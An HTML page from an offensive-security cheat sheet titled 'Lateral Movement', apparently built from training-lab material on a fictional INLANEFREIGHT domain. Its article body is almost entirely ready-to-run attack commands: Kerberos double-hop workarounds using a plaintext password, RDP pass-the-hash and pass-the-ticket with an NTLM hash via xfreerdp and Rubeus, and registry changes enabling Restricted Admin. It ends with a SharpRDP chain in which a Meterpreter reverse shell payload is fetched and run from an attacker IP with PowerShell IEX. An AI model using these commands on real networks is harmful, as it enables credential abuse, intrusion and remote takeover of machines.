
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
      
        <link rel="prev" href="../ldap/">
      
      
        <link rel="next" href="../privilege/">
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.37">
    
    
      
        <title>Lateral Movement - Hacking Awesome CheatSheet</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.8c3ca2c6.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
      <link rel="stylesheet" href="../../css/custom.css">
    
    <script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="blue-grey" data-md-color-accent="green">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#kerberos-double-hop-problem" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../.." title="Hacking Awesome CheatSheet" class="md-header__button md-logo" aria-label="Hacking Awesome CheatSheet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Hacking Awesome CheatSheet
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Lateral Movement
            
          </span>
        </div>
      </div>
    </div>
    
      
    
    
    
    
      <label class="md-header__button md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    



<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="Hacking Awesome CheatSheet" class="md-nav__button md-logo" aria-label="Hacking Awesome CheatSheet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    Hacking Awesome CheatSheet
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Home
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" checked>
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Active Directory
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            Active Directory
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../initial/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Initial
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../adenumeration/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    AD Enumeration
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../credentials/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Credentials Haunting
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../lotl/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Living Off the Land
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../acl/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    ACL Abuse Primer
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../vulns/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Common Vulnerabilities
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../trust/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Attacking Domain Trust
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../ldap/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    LDAP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  <span class="md-ellipsis">
    Lateral Movement
  </span>
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  <span class="md-ellipsis">
    Lateral Movement
  </span>
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#kerberos-double-hop-problem" class="md-nav__link">
    <span class="md-ellipsis">
      Kerberos "Double Hop" Problem
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Kerberos "Double Hop" Problem">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#workaround-1-pscredential-object" class="md-nav__link">
    <span class="md-ellipsis">
      Workaround #1: PSCredential Object
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#workaround-2-register-pssession-configuration" class="md-nav__link">
    <span class="md-ellipsis">
      Workaround #2: Register PSSession Configuration
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#rdp" class="md-nav__link">
    <span class="md-ellipsis">
      RDP
    </span>
  </a>
  
    <nav class="md-nav" aria-label="RDP">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#sharprdp" class="md-nav__link">
    <span class="md-ellipsis">
      SharpRDP
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#server-message-block-smb" class="md-nav__link">
    <span class="md-ellipsis">
      Server Message Block (SMB)
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#windows-management-instrumentation-wmi" class="md-nav__link">
    <span class="md-ellipsis">
      Windows Management Instrumentation (WMI)
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#windows-remote-management-winrm" class="md-nav__link">
    <span class="md-ellipsis">
      Windows Remote Management (WinRM)
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Windows Remote Management (WinRM)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#lateral-movement-from-windows" class="md-nav__link">
    <span class="md-ellipsis">
      Lateral Movement From Windows:
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#lateral-movement-from-linux" class="md-nav__link">
    <span class="md-ellipsis">
      Lateral Movement From Linux
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#windows-powershell-web-access" class="md-nav__link">
    <span class="md-ellipsis">
      Windows PowerShell Web Access
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#distributed-component-object-model-dcom" class="md-nav__link">
    <span class="md-ellipsis">
      Distributed Component Object Model (DCOM)
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#secure-shell-ssh" class="md-nav__link">
    <span class="md-ellipsis">
      Secure Shell (SSH)
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../privilege/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Privilege Escalation
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../bloodhound/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    BloodHound
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../crtp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    CRTP
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Enumeration
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            Enumeration
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../enumeration/nmap/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Nmap
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../enumeration/enumeration/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Enumeration
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
        
          
          <label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Footprinting
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4">
            <span class="md-nav__icon md-icon"></span>
            Footprinting
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/domain-info/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Domain info
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/ftp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    FTP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/ssh/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    SSH
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/smtp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    SMTP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/dns/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    DNS
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/imap-pop3/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    IMAP/POP3
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/snmp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    SNMP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/ldap/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    LDAP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/smb/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    SMB
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/mssql/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    MSSQL
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/mysql/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    MYSQL
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/nfs/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    NFS
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/rdp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RDP
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/tns/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    ORACLE TNS
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/ipmi/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    IPMI
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/rsync/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RSYNC
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/rservices/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RSERVICES
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/winrm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    WinRM
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../footprinting/mongodb/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    MongoDB
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../webinfogathering/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Web Information Gathering
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../file-transfer/filetransfer/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Files Transfer
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../shells/shells/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Shells & Payloads
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../metasploit/metasploit/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Metasploit
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../passwords/passwords/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Passwords Attack
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../pivoting/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Pivoting
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
        
          
          <label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Web Pentesting
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_11">
            <span class="md-nav__icon md-icon"></span>
            Web Pentesting
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../web/sqlmap/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Sqlmap
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../web/fuff/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    FUFF
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
        
          
          <label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Walkthrough
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_12">
            <span class="md-nav__icon md-icon"></span>
            Walkthrough
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../htb-academy/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    HTB Academy
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../htb-labs/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    HTB Labs
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../bash/bash_scripts/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Bash
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
        
          
          <label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Blue
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_14">
            <span class="md-nav__icon md-icon"></span>
            Blue
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../blue/phising.md" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Phishing
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#kerberos-double-hop-problem" class="md-nav__link">
    <span class="md-ellipsis">
      Kerberos "Double Hop" Problem
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Kerberos "Double Hop" Problem">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#workaround-1-pscredential-object" class="md-nav__link">
    <span class="md-ellipsis">
      Workaround #1: PSCredential Object
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#workaround-2-register-pssession-configuration" class="md-nav__link">
    <span class="md-ellipsis">
      Workaround #2: Register PSSession Configuration
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#rdp" class="md-nav__link">
    <span class="md-ellipsis">
      RDP
    </span>
  </a>
  
    <nav class="md-nav" aria-label="RDP">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#sharprdp" class="md-nav__link">
    <span class="md-ellipsis">
      SharpRDP
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#server-message-block-smb" class="md-nav__link">
    <span class="md-ellipsis">
      Server Message Block (SMB)
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#windows-management-instrumentation-wmi" class="md-nav__link">
    <span class="md-ellipsis">
      Windows Management Instrumentation (WMI)
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#windows-remote-management-winrm" class="md-nav__link">
    <span class="md-ellipsis">
      Windows Remote Management (WinRM)
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Windows Remote Management (WinRM)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#lateral-movement-from-windows" class="md-nav__link">
    <span class="md-ellipsis">
      Lateral Movement From Windows:
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#lateral-movement-from-linux" class="md-nav__link">
    <span class="md-ellipsis">
      Lateral Movement From Linux
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#windows-powershell-web-access" class="md-nav__link">
    <span class="md-ellipsis">
      Windows PowerShell Web Access
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#distributed-component-object-model-dcom" class="md-nav__link">
    <span class="md-ellipsis">
      Distributed Component Object Model (DCOM)
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#secure-shell-ssh" class="md-nav__link">
    <span class="md-ellipsis">
      Secure Shell (SSH)
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  


  <h1>Lateral Movement</h1>

<h2 id="kerberos-double-hop-problem"><strong>Kerberos "Double Hop" Problem</strong></h2>
<h4 id="workaround-1-pscredential-object"><strong>Workaround #1: PSCredential Object</strong></h4>
<ol>
<li>Try to execute a command: <code>*Evil-WinRM* PS C:\Users\backupadm\Documents&gt; import-module .\PowerView.ps1</code></li>
<li>Check with klist: <code>*Evil-WinRM* PS C:\Users\backupadm\Documents&gt; klist</code></li>
<li>Set up a PSCredential object and try again to execute a command: <ol>
<li><code>*Evil-WinRM* PS C:\Users\backupadm\Documents&gt; $SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force</code></li>
<li><code>$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)</code></li>
<li><code>*Evil-WinRM* PS C:\Users\backupadm\Documents&gt; get-domainuser -spn -credential $Cred | select samaccountname</code></li>
</ol>
</li>
</ol>
<h4 id="workaround-2-register-pssession-configuration"><strong>Workaround #2: Register PSSession Configuration</strong></h4>
<ol>
<li>Establishing a WinRM session on the remote host: <code>Enter-PSSession -ComputerName ACADEMY-AEN-DEV01.INLANEFREIGHT.LOCAL -Credential inlanefreight\backupadm</code></li>
<li>Check tickets with klist: <code>klist</code></li>
<li>One trick we can use here is registering a new session configuration using the Register-PSSessionConfiguration cmdlet: <code>Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm</code></li>
<li>Restart the WinRM service by typing <code>Restart-Service WinRM</code> in current PSSession.</li>
<li>Check again with <code>klist</code> and the double hop problem has been eliminated.</li>
</ol>
<h2 id="rdp"><strong>RDP</strong></h2>
<ol>
<li>RDP Enumeration: <code>netexec rdp 10.129.229.0/24 -u helen -p 'RedRiot88' -d inlanefreight.local</code></li>
<li>Optimizing xfreerdp for Low Latency Networks or Proxy Connections: <code>xfreerdp /u:Helen /p:'RedRiot88' /d:inlanefreight.local /v:10.129.229.244 /dynamic-resolution /drive:.,linux /bpp:8 /compression -themes -wallpaper /clipboard /audio-mode:0 /auto-reconnect -glyph-cache</code></li>
<li>Confirm if Restricted Admin Mode is enabled: <code>reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin</code></li>
<li>o enable Restricted Admin Mode, we would set the DisableRestrictedAdmin value to 0: <code>reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD</code></li>
<li>To perform Pass the Hash from a Linux machine, we can use xfreerdp with the /pth option to use a hash and connect to RDP: <code>proxychains4 -q xfreerdp /u:helen /pth:62EBA30320E250ECA185AA1327E78AEB /d:inlanefreight.local /v:172.20.0.52</code></li>
<li>For Pass the Ticket we can use Rubeus:<ol>
<li><code>.\Rubeus.exe createnetonly /program:powershell.exe /show</code></li>
<li><code>.\Rubeus.exe asktgt /user:helen /rc4:62EBA30320E250ECA185AA1327E78AEB /domain:inlanefreight.local /ptt</code></li>
<li>From the window where we imported the ticket, we can use the mstsc /restrictedAdmin command: <code>mstsc.exe /restrictedAdmin</code></li>
</ol>
</li>
</ol>
<h4 id="sharprdp"><strong>SharpRDP</strong></h4>
<ol>
<li>Execute Metasploit to listen on port 8888: <code>msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_https; set LHOST 10.10.14.207; set LPORT 8888; set EXITONSESSION false; set EXITFUNC thread; run -j"</code></li>
<li>Generate a payload with msfvenom using PowerShell Reflection: <code>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.207 LPORT=8888 -f psh-reflection -o s</code></li>
<li>Use python http server to host our payload: <code>sudo python3 -m http.server 80</code></li>
<li>Now we can use SharpRDP to execute a powershell command to execute our payload and provide a session: <code>.\SharpRDP.exe computername=srv01 command="powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.207/s')" username=inlanefreight\helen password=RedRiot88</code></li>
